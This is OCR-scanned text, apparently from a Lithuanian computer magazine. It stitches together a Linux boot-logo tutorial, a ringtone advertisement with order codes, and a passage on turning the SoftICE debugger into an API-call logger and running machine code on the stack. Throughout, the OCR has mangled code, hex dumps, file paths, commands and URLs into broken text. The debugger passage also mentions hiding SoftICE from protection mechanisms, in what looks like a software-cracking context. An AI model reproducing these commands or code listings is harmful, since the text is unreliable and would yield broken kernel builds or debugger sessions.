branduoliu. O pradėsime nuo paprastutės užduoties — logotipo 
pakeitimo, kuris matomas operacinės sistemos krovimosi metu. 


[Keičiam Iogo] Paprastai Linux krovimosi metu pasirodo šiai 
sistemai būdingas pingvinas, kuriuo jau nieko nebenustebinsi ir 
kuris jau gerokai įgriso. Norisi ko nors naujo. Kaip standartinį 
logo pakeisti kuo nors kitu? Yra keletas būdų. 

Pradėsime nuo branduolio kompiliavimo. Logo atvaizdavimu rū 
pinasi šios bylos: /usr/src/linux/drivers/video/* ir Jusr/sro/linux/ 
inelude/linux/linux Iogo.h. Kiekvieną kartą, kai branduolys krau- 
nasi derinimo (debug) arba tyliame (guiet) režimuose, šios by- 
los (be abejo, sukompiliuotu pavidalu) gauna valdymą ir į ekra- 
ną išveda vaizdą. Pats logo yra byloje linux logo.h, kur jis sau- 
gojamas paprasčiausio duomenų masyvo pavidalu. Kad būtų 
lengviau įsivaizduoti, pateikiu šio masyvo fragmentą. 


Bylos „linux logo.k“ kuriame saugomas logotipas 
unsigned char linux logo bw] | initdota = ( 

OxFF, OXFF, OXFF, OXFF, OXFF, OXFF, OFF, OFF, 

OxFF, OxFF, OxFF, OxFF, OXFF, 0x80, 0400, 0x3F, 

OFF, OXFF, OXFF, OXFF, OXFF, OXFF, OXFF, OF, 

OxFE, OXIF, OxFF, OxFF, O4FF, OxFF, OXFE, O4FF, 

OxFE, OY3F, UXFF, OxOF, OxFF, OxFF, OXFF, OXFF, 

OXFE, OXFF, OXFE, Ox7E, OXFF, OxC7, OXFF, OKFF, 


Šį masyvą galima keisti tiek rankiniu būdu, tiek ir automatiškai. 
Į rankinį variantą mes nesigilinsim, kadangi tame nėra nieko 
įdomaus (paprasčiausia rutina), kur kas paprasčiau paleisti spe- 
cialų įrankį — jis pats viską padarys. Priešingai nei Windows 
pasaulyje, kuris pasinėręs į korporatyvinę tamsą ir kuriame bas- 
tosi aštriadančiai monstrai, Linux liaudis neužspaudžia išeities 
tekstų, todėl mes galime lengvai išanalizuoti, ką daro viena ar 
kita programa ir ar to mums reikia. Nereikėtų pamiršti, jog žai- 
dimai su branduoliu gali sukelti fatališkų pasekmių. Vienas ne- 
tikslus žingsnis — ir sistema atsisakys krautis arba švariai su- 
naikins visus kietajame diske saugomus duomenis. Dėl to prieš 
bet kokios potencialiai nesaugios programos įdiegimą reikia per- 
versti jos išeities tekstus ir peržiūrėti, kokias būtent bylas ji kei- 
čia. Telieka jas perkelti į diskelį, kompaktinį diską arba flash 
atmintį, o užsikrauti visada galima ir iš Live CD. 

Mes naudosimės įrankiu logo, kurį galima parsisiųsti iš demok 
ratiško belgų serverio: http:/members.chello.be/cr26864/Linux/ 
fbdev/logo.tar.bz2. Išpakavus archyvą, mes randame tris C by- 
las ir veną makefile. Deja, dvejetainių bylų nėra, todėl jas ten- 
ka kompiliuoti savarankiškai. Palaikomos dvi branduolių versi- 
jos — 2.2 ir 2.4. 2.6 versijai reikia ypatingo požiūrio, apie kurį 
pakalbėsime šiek tiek vėliau, o kol kas sugrįžkime prie mūsų 
laukiančios užduoties. 

Analizė rodo, kad įrankis /ogo praktiškai susideda iš dviejų da: 
lių: pradinio atvaizdo konverterio, kuris yra byloje pnmtologo.c, 
ir paties branduolio pataisymo, kuris yra bylose logo 2 2.c ir 
logo 2 4.c (kiekviena konkrečiai branduolio versijai). /o 
so 2 4.c apjungia einamo logo ekstraktorių ir pataisymą, o 
logo 2 2.c — tik seno formato logo ekstraktorių, tačiau tai 
jau niuansai. O pats logotipas abiem atvejais yra pati papras- 
čiausia pcx formato byla, palaikanti ne daugiau kaip 256 spalvų 
gyli ir kurios bendras plotas ne didesnis kaip 786432 taškai 
kas atitinka 1024x768 rezoliuciją). 

Konverteris mūsų visiškai nedomina (tiesą sakant, vietoje jo 
lima pasinaudoti Gimp redaktoriaus įskiepiu: registry.gimp.org/ 
detailview.phtml?plugin =Linux+ Logo), 0 į ekstraktorių/pataisy- 
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mą mes pažvelgsime kur kas atidžiau. 


Vienos iš esminių bylos „logo 2 4.“ fragmentu, pakeičiantis logo 
static strud entry unsigned char red; unsigned char green; Unsigned char blue; | palet- 
1e16[1ė] = £ 
00,0, Į, (0, 0, 170, 3, (0, 170, 0, ), (0, 170, 170, ), 
( 170, 0, 0, ), ( 170, 0, 170, |, £ 170, 85, 0, ), ( 170, 170, 170), 
1 85, 85, 85, ), ( 85, 85, 255, ), ( 85, 255, 85, ), ( 85, 255, 255, ), 
1 255, 85, 85, |, Į 255, 85, 255, ), ( 255, 255, 85, ), ( 255, 255, 255 Į, 


static void write logo] ė(const char "filename, const unsigned char data) 


FILE "sean; int į, į; d; 

steom — fopen(ilename, *W); 

If (steam) ( peror("ile opsn sios *) eri); ) 
Ipus(“P3V8O BŪN255W1“, steam); 

tr (> i < BBVLI +— 2) 


br(į = Ųj < 2) 


t = danli=į] > > 4; 
Eprint(stream, “ Yošd Vošd Vo3d“, palette! 6[d].red, palettei ė[d].green, palel- 
te16|d].blue); 
d = datai +] 8 15; 
fprinti(sream, * 0684 Akad 63d“, paletto) 6 red, palettei d] green, palot- 
tol ė[d].bluo); 
| fpute('W, steam); 
| fdose(stream); 


int main(int arge, char "argv[]) 


write: logo("logo 2 4.pom“ linux logo,linux logo red, linux logo green,linux 10- 
go. blue); 

vie. logo bw“logo bw 2 4.pbm", linux logo. bw); 

vie: logo ė("logol 6 2 A.ppn“, linux Iogo16); 

retuin O; 


Suprasti veikimo algoriimą nėra sunku. Kaip mes matome, /0- 
go keltimo metu modifikuojamos bylos /ogo 2 4.ppm, Io- 
go bw 2 4.pbm ir logo16 2 4.ppm, kurias mes prieš įrankio 
paleidimą ir turėtume išsaugoti į išganingąjį diskelį ar kitą kau- 
pikli. Išsamiau apie tai galima paskaityti šiame straipsnyje: HOW- 
TO Linux Logo Hack (gentoo-wiki.com/HOWTO Linux Lo- 
g0 Hack). 

Kitas logo pakeitimo metodas skirtas seniems 2.2.x branduo- 
liams, kurių vis dar pasitaiko. Iš pradžių nusikopijuojame origi- 
nalią bylą /usr/include/linux/linux logo.h (beje. jeigu neturėsi re- 
zervinės kopijos, ją visada galima parsisiųsti iš interneto), po to 
paruošiame savo nuosavą xpm formato logo, kurio skiriamoji 
geba — 80x80 taškų, paletė *lygiai* 214 spalvų (čia mums ir 
vėl padės Gimp), ir ant jo užsiundom įrankį boot logo-1.01 
(Uug.umbc.edu/—mabzug1/boot log0-1.01), kuris yra papras- 
čiausias Perl skriptas, paleidžiamas štai taip: 


+ baot logo-.01 your imagespm > linu logo.h 


Jeigu viskas bus padaryta be klaidų, 
tai einamame kataloge bus sukurta 
byla linux Iogo.h, kurią mums reikia 
nukopijuoti į katalogą /usr/include/li- 
mux. Dabar reikia perkompiliuoti bran- 
duolį ir perkrauti kompiuterį. Jeigu sis- 
tema nepakibs, tai ekranė bus paro- 
dytas naujas /ogo, kuris gali atrodyti 
taip, kaip, pavyzdžiui, parodyta pa- 
veikslėlyje „pakeistas logo“. Jeigu iš- 
kils problemų, pagalbos galima ieš- 
koti adresu /Jug.umbc.edu/-mabzug1/boot Iogo.himl. 


[Preparuojam 2.6] Su 2.6 versijos branduoliu viskas kur kas 
paprasčiau. Sukuriame png formato ir bet kokio protingo dydžio 
paveikslėlį, praleidžiame jį per įranki pngtopnm, kurį reikia pa- 
leisti su šiais komandinės eilutės raktais: 


+ pigtopnm logo.png | pamtoplainpam > logo linux cdut224.ppm 


O po to gautą bylą permetame į pastovios dislokacijos vietą: 
26 cp logo. linux dut224.ppm /us/srelinuy/drivers/videa/logo/ 


Telieka sukonfigūruoti branduolį. tam reikia pasinaudoti inte- 
raktyviu konfigūratoriumi. Tarp kitų naudingų (ir nelabai) pasi- 
rinkimų jame bus Bootup logo ir Standard 224-color Linux |0- 
go. Štai juos ir reikia pakoreguoti. 


Interaktyvus logo kontigūravimas 2.6 versijos branduoliui 
Device Drivers -> 
Graphics Support -> 
[7] Support for Aume bulfer devices 
["] VESA VGA graphics support 
Console display driver support -> 
[] Video mode selection support 
<*> Framebulies Console suppor 
|"]Selec compiled-in fons 
ĮJGA Bxl6 font 
Logo configuration ->> 
["] Bootup logo 
[7] Standard 224-color Linux logo 


Paleidę make perkompiliuojam branduolį ir pakoreguojame kon- 
figūracinę bylą /boot/grub/menu.lst, joje pridėdami raktą 
vga=0x318. Finale turėtų gautis maždaug štai toks užrašas: 
kernel (hdO,0)/vmlinuz root=/dev/sda3 vga=0x318. Persikrau- 
name. Ekrane iškilmingai pasirodys naujasis logo, švytėdamas 
visomis savo 224 spalvomis. Gražu? Tačiau tikri hakeriai pripa- 
žista tik tekstinį terminalą ir konsolinį režimą su ANSI pseudog- 
rafika, o GUI nustumiamas į šoną. Labai populiarus ASCII logo. 
kurį galima įdiegti su programa Linux logo (www.deater.net/we- 
ave/vmwprod/linux logo/). Tame pačiame serveryje yra paruoš- 
tų pavyzdžių kolekcija, du iš kurių pateikti žemiau. 


[Pabaiga] Štai mes ir nuhakinom pingviną, ką padarėme ne 
vienu, 0 keliais būdais. Kūrybai čia iš tiesų paliktos beribės erd- 
vės, O paieška internete su raktiniais žodžiais „linux logo“ patei- 
kia daugybę resursų, kurie vienas už kitą įdomesni. Taigi sėk- 
mės studijuojant. 
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Įsitkink, ar tinka draugo telefonui. 
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VAMPYRO BALSAS: 
AS TAVE MATAU! 


James Brown: I Feel Good 
A. Mamontovas: TV daina |14 


120239680 
220018650 
145379660 


Motociklo garsas: Brum brum. 


Serega; Juodas bumeris 126488680 
Skambutis Iš morgo 206609580. 
A. Mamontovas. Ar tai būtum tu 218679650 


Rammstein: Du Hast 
Egzotiškų paukščių giesmė 


Įsikinkte, kad telefono įjungta GPRS paslauga, Ši pasiauga galima Omnitel 


127019660 
122419560 
Bitės GSM i Teie2 kieniams, Išekyrus PILDYK ir MAŽYLIO vartotojus. 
Nusiųskite žinutę su vakalinos melodijos kodu numerį 1318 
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Iš kt. „Krikštatėvis“ . 124739650 
L.aetnoren: Manlio sonata Eo9i 218729040/ 218719060p) 
iš serlalo "Brigada" 341496401 a4149560p) 
Grazy Frog: Axel F 1662590s0  166244560p 
Is Danguje: O Dangui 210629840 210614660p 
Vudis: Žodžiai tossomio 1osioas0p 
Omnitel: Partera 72869640  72949660p 
A. Namontovas: TV daina įAUMSU 218769840 118719660p 
Scooter: Maria (| Ike It Loud) UT 
Iš kt. „Maris Poteris“ 146719840  146719660p 
Linkin Park: In the End Mas86s0 11219660p. 
G86 Sindikstas: Sielos nemiega ĮLIUALU | 216619640 219619660p, 
Tele2: Paplepėkim, 1564796s0 166879660p 
iš mi. „Liūtas Karalius“ 1a1570650. Iats70660p) 
Jurga: Nebijok 186589640 186349660p 
Natas: 1 valanda 25 minutės 215859040  2158406505 
Inculto: Welzome NA] 218509640, 2186(9660p 
škūbis Dū. os49646/ 6849660p| 
Jurga: Pinalis 218549050 | 26649660p| 
Leningrad: Nne bl V nebo 20508650 | 20549660p 
Depeche Mode: Sulfer Well 212728640  212719660p 
Yu-Gi-Oh: You're Not Me i26848640. 126849660p 
Neo: Man nesvarbu MAUAJŲ 218589640 218549660p 
Andrius: Mes vyrai 176279660  176279660p 
Žilvinas Žvagulis; Faina 151279650 R | 
Milana: Mylėk Karštai 2io619080 | 2i06'8660p 
Juanes: La Camisa Negra 176239640/ 1762196609 
Gravel: Round and round *. 216169650 216169660p, 
Arash: Tike tiko kardi 188549660 66549660ph 
Raketa: | Niubą I76660040| 176049660p 
Amberlie: Cay Or Night 2i0469640 Zi04t8660p: 
Aaa kad islafone įjungta GPRS. Netinka PILDYK ir MAŽYLIO vartotojams. | 
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„SoftlCE“ kaip logeris 


Pasakojimas apie asemblerį, bran- 
duolio lygio derintuvą ir makrosus 
YRA DAUGYBĖ NAUDINGŲ PROGRAMŲ, SE- 
KANČIŲ ĮVAIRIAUSIUS SISTEMINIUS ĮVYKIUS 
(PAVYZDŽIUI, ŠNIPINĖJANČIOS API FUNK- 
CIJAS). DAŽNAI JŲ GALIMYBĖS SMARKIAI 
RIBOTOS, TODĖL HAKERIAI KURIA SAVO 
ĮRANKIUS, PRIE KOMPILIATORIAUS PRA- 
LEISDAMI ILGAS ŽIEMOS NAKTIS. GAL NO- 
RI SUŽINOTI TRUMPESNĮ KELIĄ? 


Man jau seniai niežtėjo letenas parašyti straipsnį apie logini- 
mą. Paimkime kad ir tuos pačius API šnipus. Visos programos, 
kurias man teko matyti, labai dažnai lūždavo be jokių akivaiz- 
džių priežasčių arba jas apeidavo virusai/apsaugos mechaniz- 
mai, dėl ko pačios vertingiausios API funkcijos likdavo Už borto. 
Be to, sugeneruotų logų dydis tiesiog pritrenkdavo. Tarp milijo- 
nų pakrikų eilučių nebuvo praktiškai nieko įdomaus, o funkcijų 
filtravimo sistema (jeigu tokia iš viso buvo) — bukesnė už mano 
uodegą. Be abejo, būtų galima logą perleisti per išorinį su Perl 
arba C parašytą filtrą, bet kiek tam reikės programuoti! Jau 
nekalbant apie tai, kad mums gali prireikti informacijos. kurios 
nėra loge, pavyzdžiui, ar po nurodytos API funkcijos eina ko- 
manda TEST EAX,EAX, ar ne. O jeigu mes norėsime šnipinėti ne 
tik API, bet ir ką nors visiškai kito? Pavyzdžiui, perimti apsikeiti- 
mo su tvarkykle ar aparatūra protokolą. 

SoftlCE mums suteikia tokią galimybę! Mes tiesiog sukuriame 
sąlyginį sustojimo tašką (conditional breakpoint) su gudriais pa 
rametrais ir priverčiame derintuvą vietoje pasirodymo ekrane 
visą informaciją saugoti į logą. Beje, čia ir vėl tu pats gali nuro 
dyti, kokius duomenis ir kokia tvarka išvedinėti. Makrosų siste 
ma — galingas dalykas, tačiau iki galo jį išnaudoja toli gražu ne 
visi hakeriai. Nori gauti lankstų ir konfigūruojamą logerį su prak 
tiškai neribotomis galimybėmis? Tai ko gi mes laukiam?! 


[Lengva mankštelė] Prieš pradedant Soft/CE naudoti kaip lo- 
geri, jį reikia teisingai sukonfigūruoti. Paleidžiame Symbol Loa- 
der, lendam į Edit -> SoftICE initialization settings ir iki keleto 
megabaitų padidiname istorijos buferio (history buffer) dydį. Tiksli 
reikšmė priklauso nuo konkrečios užduoties. Kuo daugiau infor- 
macijos mums reikia surinkti per vieną seansą, tuo didesnis 
turi būti buferis. Kadangi buferis veikia žiedo principu, tai jį už- 
pildžius neįvyksta joks perpildymas, tiesiog švieži duomenys per- 
rašo pačius seniausius. Macros Definition skyrelyje galima pa- 
didinti vienu metu naudojamų makrosu kieki — nuo 32 (pagal 
nutylėjimą) iki 256. Tačiau tai jau priklauso nuo tamstos įgei- 
džių. Daugeliui užduočių 32 makrosų riba niekam netrukdys. 
Dabar vietoje mankštos pabandykime pasekti funkcijos Create- 
FileA iškvietimą, kuri naudojama įrenginių ir bylų atidarymui. 
Sukursime tokio tipo sąlyginio sustojimo tašką: „bpx CreateFi- 
IeA DO “x;"'. Raktinis žodis DO apibrėžia derintuvo komandų, 
kurias jis turi įvykdyti po to, kai suveikia šis taškas, seką. Ko- 
mandos atskiriamos kabliataškiu, išsamiau apie jų sintaksę ga- 
Ilma perskaityti derintuvo vartotojo dokumentacijos skyrelyje 
„Conditional Breakpoints“. Šiuo atveju čia pateikta tik koman- 
da x“, kuri reiškia nedelsiamą išėjimą iš derintuvo. 
Nuspauskime <Ctrl-D> kad grįžtume į Windows ir pabandyki- 
me atidaryti bet kokias bylas, o kai tai atsibos, iškvieskime Sym- 
bol Loader ir išsaugokime SoftiCE istoriją į protokolo bylą (File - 
> Save SoftlCE history as). Po neilgo disko darbo jame pagal 
nutylėjimą sukuriama byla winice.log. Pažiūrėkime, kas joje: 


Mūsų pirmasis protokolas 

Break due to BPX KERNEL32!CreateFilaA DO “47 (ET-—1.44 seconds) 
Break due to BPX KERNEL32!CreateFilsA DO "x (HT--940.19 miliseconds) 
Break due Jo BPX KERNEL32!CreoteFileA DO *);" (ET 14.51 seconds) 
Break due to BPX KERNEL32!GreatefiloA DO "x" (ET 19.23 milliseconds) 
Break due to BPX KERNEL32!CieatoFileA DO "x" (ET 13.88 milliseconds) 


Mes matome daugybę eilučių, kiekviena kurių aprašo sustoji- 
mo taško suveikimo priežastį ir laiką. Atrodytų, kad viskas gerai, 
bet iš esmės nieko gero. Kokia byla atidaroma kiekvienoje eilu- 
tėje? Ar ši operacija baigėsi sėkmingai, ar ne? Kitaip tariant, 
mūsų sustojimo tašką reikia iš esmės apdoroti. 

Štai patobulintas variantas (dėmesio, So/tICE neleidžia vienai 
funkcijai sukurti dviejų sustojimo taškų ir, prieš sukuriant naują, 
senas turi būti pašalintas su komanda „bc 0'): 

Breikas, spausdinantis visų atidaromų bylų pavadinimus 


bpx CeateFileA DO "D esp->4 L 20; 5" 


Kas pasikeitė? Atsirado bylos pavadinimo išvedimas: „D esp 
>4 L 20, kur ,D' — turinio (dump) atvaizdavimo komanda, 
„esp->4' — rodyklė | pirmąjį funkcijos CreateFileA argumentą 
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(ką atidarinėti). o .L 20: — kiek baitų išvesti (konkreti reikšmė 
pasirenkama pagal skoni). Ištestuokime atnaujintą variantą. 
Spaudžiam <Ctrl-D>, išeinam iš derintuvo, paleidžiam kokią 
nors programą, kurią norime pašnipinėti (pavyzdžiui, FAR), po 
to vėl nuspaudžiam <Ctr!-D>, užeinam į derintuvą ir koman- 
duojam „bd O", kas nutraukia šnipinėjimą. Išeinam iš Soft/CE, 
užeinam į Symbol! Loader ir išsaugome istoriją į diską. Šį kartą 
mes gauname: 


Patobulintas protokolas su atidaromų bylų pavadinimais 

Break due to BPX KERHEL32!CreoteFileA DO "d esp-->4 I 2044“ (ET-=3.64 seconds) 
0010:004859£8 43 4F 4E 4F 55 54 24 00-43 4F 4E 49 4E 24 00 49 CONOUTS.CONINE.L 
0010:004859F8 6E 74 65 72 66 61 63 65-00 40 6F 75 73 65 00 25 nlerface.Mouse.*o 


Brook due to BPX KERIEL32!CreatofiloA DO "d esp->4 L 2047 (ET--8.98 miliseconds) 
0010:004859F0 43 4F 4E 49 4E 24 00 49-6E 74 65 72 66 61 63 65 CONINS.lnterluts 
0010:00485A00 00 40 6F 75 73 65 00 25-63 00 25 30 32 64 3A25 Mouse 26, Y602d:ė6 


Break duo to BPX KERNEL32!CrenteFiloA DO “d esp->4 L 20547 (ET- 16.93 milliseconds) 
0010.00492330 43 3A 5C 50 72 6F 67 72-61 60 20 46 69 6C 65 73 C-Progiom Files 
0010:00492340 5C 46 61 72 5C 46 61 72-45 6E 67 2E 6C 6E 67 00 Mar FarEng.Ing: 


Visai kas kita! Dabar atvaizduojamas atidaromos bylos pavadi- 
nimas, o mūsų improvizuojamas šnipas pamažu pradeda veik- 
ti. Vis dėlto čia nėra tokių svarbių ingredientų, kaip API funkciją 
iškvietusio proceso identifikatorius ir grįžimo kodas. Tačiau ka 
mums reiškia prie sustojimo taško pridėti dar keletą eilučių? 
Galutinis sustojimo taškas 


bpx CreateFileh DO “? PID; D esp->4 L 20; P. RE; ? EA X" 


Komanda ,? PID“ išveda proceso identifikatorių, „P RET' laukda- 
ma grįžimo įvykdo API funkciją, o ,? EAX“ išveda EAX registro 
turinį, kuriame saugomas grįžimo iš API funkcijos kodas, o vis- 
kas kartu veikia taip: 


Pilna protokolo versija 

Break due to BPX KERNEL32!CreateFileA DO *? PID; D esp-4 L 20; P RET ? LA 4" 
000001 DC 0000000476 “27 ;PID 

0010.0012138C 43 44 2E 73 6E 61 69 6C-2E 65 78 65 00 61 5F 65 CDsnai.ese0 e 
0010:0012139C 2E 65 78 65 00 00 00 00-00 00 00 00 00 00 00 00 me. 


—21 —04 
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Istorijos buferio dydžio konfigūravimas. 
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00000074 0000000116 “+ ; grįžimo kodas 

Bieok due to BPX KERNEL32 CrenteFileA DO *? PID; D esp- >4 L 20; P RET; ? EA 47 
000001 0C 0000000476 *?* „PD 

0010:0012138C 64 65 60 6F 2E 63 72 6B-2E 65 78 65 00 61 5F 65 demo akoe.0 e 
0010:0012133C 2E 65 78 65 00 00 00 00-00 00 00 00 00 00 00 00 exe. 
00000074 0000000116 “1 ; grižimo kodas 


Break due to BPX KERNEL32!CrealeFileA DO "? PID; D esp->4 L 20; P RET; ? EM 4" 
000001DC 0000000474 "7" ; PD 

0010:0012138C 64 65 60 6F 2E 70 72 6F-74 65 63 74 65 64 2E 63 demo.piolected.c 
0010:0012135C 72 68 2E 65 78 65 00 00-00 00 00 00 00 00 00 00 ikaxe....... 
00006074 0000000116 “+ ; grįžimo kodas 


Sutik, kad su tokia ataskaita jau galima padirbėti! Mes jau pa- 
siekėme standartinio API šnipo funkcionalumo, tačiau norint 
filtrą galima lengvai pakeisti, pridėjus naujus atrinkimo kriteri- 
jus. Protokolo ataskaitos formatą taip pat labai lengva pratur- 
tinti naujomis detalėmis, išvedant visas reikiamas detales, ku- 
fių tik gali prireikti (pavyzdžiui, iškvietimų steko turinį). Be abejo, 
šis kelias neapsieina be problemų. Nuolat iššokantis Soft/CE 
bjauriai mirga ir ryja našumą. Ar galima kaip nors jį priversti 
rašyti protokolą, bet neišplaukti? Galima! Derintuvas palaiko 
specialią funkciją BPLOG, kuri visada grąžina TRUE ir kuri slopi- 
na derintuvo išplaukimą. Deja, kartu su tuo slopinama ir po DO 
einanti komandų seka, o tai reiškia, kad išsamių ataskaitų kū- 
rimas yra neįmanomas, todėl mūsų tikslams toks būdas netin- 
ka. Kitų „antiišplaukimo“ priemonių mūsų dispozicijoje nėra. 
Dar vienu galvos skausmu tampa protokole esančios šiukšlės. 
Naudingi duomenys susimaišo su kita į ekraną išvedama infor- 
macija ir... Koks čia gali būti lengvas skaitymas! Neparašius 
specialaus ataskaitų formatavimo įrankio mes pražūsim. Vis dėlto 
programuoti su Perl tingisi, tačiau į pagalbą ateina... teisingai! 
Makrosai! Tik šį kartą ne iš Soft/CE, o tie, kurie įmontuoti į FAR. 
Spaudžiam <F4> (FAR'e) ir atidžiai žiūrime į mūsų ataskaitą. 
Kaip matyti, kiekviena ataskaitoje pateikiamos informacijos por- 
cija prasideda eilute „break due to“. Būtent jos mes ir ieškosi- 
me! Norėdami pradėti rašyti makrosą, spaudžiam <Ctrl->, po 
to <F7> „break due to“ <ENTER>. Dabar <Shift- rodyklė į 
dešinę> kol nepažymėsime visko, kas nereikalinga, iki „Crea- 
teFileA“, spaudžiam <Crl-Del>, kad tai iškirptume, <Ctrl-Shift- 
rodyklė į dešinę>, kad pereitume prie DO, kurį mes taip pat 
šaliname kartu su eilutės likučiu ir t.t. Taip karpome tekstą kiek 
tik norim. Tai sunku aprašyti žodžiais, lengviau parodyti galutinį 
rezultatą. Po to, kai makrosas bus sukurtas, pakaks jį pritaikyti 
protokolui nurodytą kartų skaičių (tiesiog nuspausti jam priskir- 
tą klavišų kombinaciją ir neatleisti), po ko mes gausim maž- 
daug tokį vaizdą: 


Išlaižytas protokolas, iš kurio išmesti visi nereikalingi dalykai 
CreatefileA, PID:1 DCh; NAME: CD.snail.exe; RET: 74h 
CieotefileA, PID:1DCh; NAME: demo.crk.exe; RET: 74h 
CisotefileA, PID:1DCh; NAME: demo protected.crk.exe; RET: 74h 


Visai padorus rezultatas, kaip keletui minučių darbo! Su mak- 
rosais galima padaryti viską arba praktiškai viską! Ir tegu kai 
kurie niekinamai nusišaipo, atseit toks kelias nėra profesiona- 
Jus. Svarbiausia, kad iškelia užduotis buvo įvykdyta per rekor- 
diškai trumpą laiką, o visa kita jau nėra svarbu. 


[Sudėtingesni filtrai] Iki šiol mes nesukūrėme nieko, kas būtų 
sudėtingiau už įprastinį API šnipą, kurių galima rasti daugybę. 
Pradėsime nuo to, kad Soft/CE (ypač naudojant aparatinius 
„bpm“ tipo sustojimo taškus) kur kas mažiau konfliktiškas, nei 
didžioji tokių šnipų dalis. ir lengvai veikia ten, kur kitos prie- 
monės jau nesusidoroja su joms iškelta užduotimi (ypač jeigu 
Ji prieš tai užlopytume su paketu /ceExt, kuris derintuvą pasle- 
pia nuo kai kurių apsauginių mechanizmų). Visas įdomumas 
dar tik prasideda! 

Pabandykime šiek tiek pasunkinti užduotį. Mes šnipinėsime ne 
visas bylas, o tik tas, kurių pavadinimai prasideda raide „a“. Tai 
visiškai nesudėtinga! 

Sustojimo taškas, šnipinėjantis „a“ raide prasidedančių bylų ati- 
darymą 


bpx CreatefileA if byte ("esp->4) = ="a' DO 0 


Problema tame, kad jeigu funkcijai CreateFileA perduodamas 
pilnas bylos pavadinimas su keliu, mūsų sustojimo taškas jau 
nesuveiks, kadangi jis tikrina tik pirmąjį pavadinimo simbolį, o 
SoftICE arsenale sub-eilutės paieškos funkcijos, deja, nėra. Kaip 
sakoma, konstrukciškai nenumatyta. Kaip gaila, tačiau ir tai ne 
bėda! 

Remsimės tuo, kad aukščiau steko rodyklės esanti atmintis daž- 
niausiai būna laisva ir gali būti panaudota mūsų nuožiūra. O ką, 
jeigu mes ten įrašytumėm mažytę asemblerio programą ir per- 
duotume jai valdymą? Jeigu tai pavyks (o taip tikrai bus, patikėk 
manim), mes galėsime neribotai plėsti derintuvo funkcionalu- 
mą, nesigriebdami įskiepių (plugins), kurie nėra pilnai doku- 
mentuoti (tiksliau šnekant, visiškai nedokumentuoti), gana gre- 
mėzdiški, nejudrūs ir t.t. 

Norint vykdyti programą steke, mums reikalingas vykdo- 
mas stekas. Iki šiol tai nesukeldavo problemų, ir steke 
buvo galima vykdyti bet kokį kodą be jokių gudrybių. Vis 
dėlto dabar situacija pasikeitė, kovos su virusais ir tinklo 
kirminais pike procesorių gamintojai susikooperavo su „Mic- 
rosoft“ ir paskutinėse Windows XP versijose bei mano ne- 
kenčiamoje Longhorn pagal nutylėjimą stekas apsaugotas 
nuo vykdymo. Po pirmojo bandymo steko apylinkėse vyk- 
dyti mašininį kodą sistema išmeta dialogo langą, kuriame 
siūloma arba atjungti apsaugą, arba negerai programai pa- 
daryti charakirį. 

Norėdami įgyvendinti savo sumanymą, mes turime padaryti 
štai ką: 


* mūsų funkcijos mašininį kodą įkurdinti virš steko viršūnės; 

* išsaugoti einamą EIP registro ir vėliavėlių registro reikšmes 
(pavyzdžiui, tame pačiame steke); 

* išsaugoti visus mūsų funkcijoje keičiamus registrus; 

* EIP nurodyti mūsų funkcijos pradžią: 

* vienaip ar kitaip perduoti argumentus (pavyzdžiui, per regist- 
rus); 

* įvykdyti funkciją, darbo rezultatus grąžinant per, pavyzdžiui, 
* išanalizuoti grąžintą reikšmę, atliekant vienus ar kitus veiks- 
mus; 

* atstatyti pakeistus registrus; 

*atstatyti ElP ir vėliavėlių registrus; 

* pratęsti normalų programos vykdymą. 


Skamba grėsmingai, tačiau tame nėra nieko sudėtingo. Pa- 
bandykime iš pradžių įvykdyti funkciją XOR EAX,EAX/RET. Kaip 
ją paversti mašininiu kodu? Be abejo, galima pasinaudoti HIEW 
arba net FASM, tačiau kam išeiti iš SoftICE? Pakanka pereiti į 
bet kurią laisvos atminties vietą ir duoti komandą ,a' (assem- 
ble — tai yra asembliuoti), tik prieš tai reikia įsitikinti, kad tu 
esi derinamos programos kontekste (jos pavadinimas atvaiz- 
duojamas dešiniame apatiniame ekrano kampe), o ne bran- 
duolyje, nes priešingu atveju tavęs laukia krachas. 


Mūsų funkcijos asembliavimos su SoflCE 
0657-10 

0023:0012B0DC or e0x,eax 
0023:0012B0DE rei 

0023:001280DF 


d esp-10 
0023:0012800C 33 C0 C3 00 DB 80 FB 77-88 AE FB 77 FF FF FF FF 3... MM 
0023:0012B0EC 31 08 43 00 E8 59 48 00-00 00 00 CO 03 00 00 00 TC... 


Dabar mūsų programa yra steke, tačiau kaip ją įvykdyti? Ogi 
labai paprastai! Tereikia pasakyti „G esp-10“ (pereiti adresu esp- 
10), ir tegu procesorius sukasi kaip gali. Tiesa, norint valdymą 
grąžinti į einamą derinamos programos vietą, prieš tai būtina 
išsaugoti ElP registrą, o tai padaryti ne taip jau paprasta. Ko- 
manda „E (esp-10) ElP' neveikia, kadangi čia negalima naudoti 
išraiškų (o registro pavadinimas yra išraiška) ir pasiunčia mus 
su neerotišku syntax error. Kaip toliau gyventi? Ką sudoroti? Ką 
daryti?! 


Pabandykime pasinaudoti komanda „M' (move), kuri kopijuoja 
atminties blokus iš vieno adreso į kitą. Tuomet mes galėsime 
dalį originalios programos išsaugoti stekė, o pačią programą 
modifikuoti savo nuožiūra. Mes turėsime įrašyti PUSH EAX/MOV 


EaK-p0000000 | ESX+000SDDT6 | ECX+00060E04 | EDK-0O580003 | ESL 17E8668C 
ED1-00000001 | EBP-bO000000 | ESP-00067845  EIPAT6B650C1 odlalaPe 
£S:0018 DS-0023 SS:0023 ES-0023 FS:0038 GS:0000 
(0 
0018:00420048 00 00 60 00 0 66 00 60-00 09 60 60 68 08 00 00 > 
001B-06420040 90 60 81 60 60 00 00 00-0C 00 06 00 00 A1 OB 00 ! 
0018:094208C0 30 00 31 AB 40 C6 60 00-38 40 24 81 00 00 08 60 0.18. XM 1 
0016.00420000 00 00 80 00 60 00 00 00-00 00 00 00 00 60 00 00 + 
0016: T6PB6048 CALL 76006C80 - 
0016: 76E86040 IMP Eik ERP 
0018, T666604F 10U [E8K] EK 
0018: 76086061  JNZ 76886008 
9018: T6EB6DE3 CHP [EB4+10].ED1 
T6866066  NDU EBX 
766060F 1 
G696D6A T68B7062 
Eik EaX i 
TC 
1 


makrosas, kuris įwykdytas komandas išskiria 
žydra spalva; nejvykdytos Komandos Išskiriamos pikai 


EAX,ESP/SUB EAX,10h/CALL EAX. Kitaip tariant, mums reikia 
komandos CALL ESP-N, tačiau kadangi tokios komandos x86 
procesorių leksikone nėra ir niekada nebuvo, mums teks ją emu- 
liuoti panaudojant matematines transformacijas su bet kokiu 
papildomu registru, pavyzdžiui, EAX. Mašininiame kode tai at- 
